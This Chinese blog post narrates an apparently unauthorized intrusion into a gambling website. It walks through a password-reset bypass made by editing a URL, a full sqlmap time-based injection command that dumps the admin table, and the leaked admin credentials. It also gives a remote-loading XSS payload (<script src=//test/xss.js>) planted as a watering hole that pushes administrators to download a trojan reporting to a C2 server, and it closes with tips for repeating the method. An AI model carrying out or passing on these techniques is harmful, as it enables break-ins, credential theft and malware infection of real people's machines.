前言

　最近闲来无事，好久也没实战了，直接找BC开刀，最后全靠XSS上线。

信息搜集

　　首页如下，我随手输入一个admin 123456，果然没有奇迹发生

　　点击忘记密码，输入admin
　　

　　很好，至少说明存在admin账号
　　

　　上图url为Public.forgetPaw1.userName.admin.do，我直接修改成Public.forgetPaw2.userName.admin.do后。芜湖，成功绕过验证，赶紧设置一个新密码，登录进去看看，其实这里也可以随便注册的，但我就想看看admin账号有什么东西。
　　

　　看这中奖榜心动不，再看看此账户余额0元，我就知道这是个假账号
　　

　　看看个人中心的交易等等记录，全部都是空的，假账号实锤
　　

　　看到头像，立马找上传点，好家伙呀，头像都不能自己上传，安全性真高呀。
　　

　　在此页面，到处点点，翻翻翻，都没找到可利用的地方。主要是功能太少了，来到客服页面，尝试一波XSS看能打上线不。
　　

　　这聊天界面，一输入<script>字符，就被跳转到下面的留言框，看来是有waf的。
　　

　　这不上传点来了嘛，抓包一看，腾讯云的waf，客服页面我是打不动了。
　　

　　扫扫目录，基本啥也没有
　　

　　看看index.html，宝塔搭建
　　

　　随便在url栏，乱输入，爆路径了
　　

　　赶紧记下绝对路径，后面可能有用，这不 ThinkAdmin 嘛，基于 ThinkPHP 开发的，拿出工具开始梭哈。
　　

SQL注入

　　梭哈失败后。用fofa找到了后台登录页面
　　

　　再次用 ThinkPHP 利用工具梭哈，竟然有个日志泄露，而下面的工具梭哈主站是找不到日志泄露的，所以渗透的时候要多仔细。
　　

　　下载下来看了看日志的信息也没有啥，也可以去遍历它的日志，再筛选出有用的信息，不过太漫长了，而且也不一定有回报，这条路我就放弃了。登录页面试了试弱口令无果。登录页面抓包放到slqmap跑跑
　　

　　出sql延时盲注了，注入点在info[name]
　　

　　后面经过漫长的等待，终于找到管理员的账号了

python sqlmap.py -r 1.txt --random-agent --force-ssl --technique=T --proxy=socks5://127.0.0.1:10808 -D caipai -T caipiao_adminmember -C username,password,safecode --dump

　　账号信息 keful:MDAwMDAwMDAwMLGIet6Gp7lr:147258，admin:MDAwMDAwMDAwMLZ8ftWaqtCpmb2ooMR5nKevjJKEfop2dQ:159357
　　这密码咋看都不像md5，果然解不出来
　　

　　遇到困难不要怕，不就是密码解不出嘛，我反手一个123456，keful账号就成功进去了，弱口令永远的神。大哥留个联系方式呀，源码给我一个。
　　

　　又到了经典的找上传点环节，这下后台连修改头像的按钮都没有，比前台更安全。看了看充值记录和提现记录，我的评价是一眼丁真，鉴定为假。
　　

　　试了试前面的绝对路径上传文件，失败。
　　

　　用的 KindEditor 编译器版本 4.1.10，它存在CVE-2017-1002024 文件上传漏洞，不过这里没有，遗憾。
　　

XSS水坑钓鱼

　　进展卡在这里了，后来师傅指点可以用XSS水坑钓鱼。这里我没进行页面跳转，直接利用xss加载伪造页面，收杆的话使用服务端做判断。如果对方不下载木马，那他就会一直卡在这个崩溃页面，除非他会f12禁用js。本地测试xss，XSS平台成功收到信息。
　　

　　在写xss的payload的时候，URL处一定要是 <script src=//test/xss.js></script> 这样的，而不是这样 <script src="https://test/xss.js"></script> ，也不能是这样 <script src="http://test/xss.js"></script>。因为如果你写成https://test/xss.js，而目标站点用http协议的话，是连不上xss平台的，反之亦然。所以使用 //test/xss.js 这样的写法，让它自动切换协议，保证和目标站一致。
　　找插入xss的点要考虑三个问题。第一个，插入后的xss payload最好能被编辑。第二个管理员最好刚刚登录页面，就渲染我们的恶意js。第三个，不要影响到前台的正常用户。
　　第一个xss点，下面的框框是可以随便xss的，但是一旦成功插入，就不能再编辑我们的xss了，所以这个点暂时放弃。
　　

　　第二个xss点，这里就能反复编辑，但是有可能影响到前台用户，测试的时候，用h3标签，如果h3都不行，那script标签也基本没戏。
　　

　　成功xss
　　

　　后面我反复找xss点，都没找到一个满意的点，始终不能满足我前面提到的3个问题。算了，管它的，就在这里插入我的恶意js。等管理员上线，再点击内容管理中的咨询栏目管理，才能触发，行吧，慢慢等吧。
　　几天后，查看c2平台，已经成功上线了，哎，柬埔寨老哥，又是被骗过去的，祝你早日回家吧。
　　

总结

　　这是我第一次打下bc站，而面对非常规站点，要出邪招。这种最终目标是要拿到个人或客服的机子权限，而不是拿下服务器。因为大部分有用的信息都在个人机上。如果拿下了服务器，就需要在管理员的必经之路上，插入恶意js。比如直接在后台页面加入恶意js，这样又形成水坑钓鱼，让管理员上线。最快的方式就是在客服聊天界面，找XSS，这就考验师傅们的绕过功底了。

文章来源：https://maidang.cool/2023/52542.html